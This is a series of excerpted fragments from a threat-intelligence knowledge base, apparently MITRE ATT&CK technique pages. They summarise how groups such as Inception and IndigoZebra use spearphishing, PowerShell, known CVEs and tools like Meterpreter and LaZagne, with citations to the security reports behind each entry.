…up Gorgon Group has obtained and used tools such as QuasarRAT and Remcos . [40] G0100 Inception Inception has obtained and used open-source tools such as LaZagne . [41] G0136 IndigoZebra IndigoZebra has acquired open source tools such as NBTscan and Meterpreter for their operatio…

…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Microsoft Threat Intelligence. (2024, October 31). Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network. Retrieved June…

…IcedID has been delivered via phishing e-mails with malicious attachments. [93] G0100 Inception Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise. [94] [95] [96] [97] G0136 IndigoZebra IndigoZebra sent spearphishing…

…December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Per…

…has been delivered via phishing e-mails with malicious attachments. [118] [119] G0100 Inception Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise. [120] [121] [122] [123] G0136 IndigoZebra IndigoZebra sent spearphis…

…oad. [43] G0126 Higaisa Higaisa has exploited CVE-2018-0798 for execution. [44] G0100 Inception Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution. [45] [46] [47] [48] S0260 InvisiMole InvisiMole has installed legitimate but vulne…

…s a backdoor through which remote attackers can read data from files. [59] [60] G0100 Inception Inception used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host. [61] S0260 InvisiMole InvisiMole can collect data from the system, and can monito…

…eat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. F-Secure Lab…

…D has been executed through Word documents with malicious embedded macros. [79] G0100 Inception Inception lured victims into clicking malicious files for machine reconnaissance and to execute malware. [80] [81] [82] [83] G0136 IndigoZebra IndigoZebra sent spearphishing emails con…

…werShell cmdlets New-MailboxSearch and Get-Recipient for discovery. [135] [136] G0100 Inception Inception has used PowerShell to execute malicious commands and payloads. [137] [138] G0119 Indrik Spider Indrik Spider has used PowerShell Empire for execution of malware. [139] [140]…

…nds. [92] S0170 Helminth One version of Helminth uses a PowerShell script. [93] G0100 Inception Inception has used PowerShell to execute malicious commands and payloads. [94] [95] G0119 Indrik Spider Indrik Spider has used PowerShell Empire for execution of malware. [96] [97] S03…

…eat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020. Szappanos…

…rs Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018. Volexity Threat Research. (2024, April 12). Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400). Retrieved Nov…

…werShell cmdlets New-MailboxSearch and Get-Recipient for discovery. [148] [149] G0100 Inception Inception has used PowerShell to execute malicious commands and payloads. [150] [151] G0119 Indrik Spider Indrik Spider has used PowerShell Empire for execution of malware. [152] [153]…

…eat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. Hamzeloofard, S. (2020, January 31). New wave of PlugX targets Hong Kong | Avira Blog. Retrieved April 13, 2021. Insikt Group…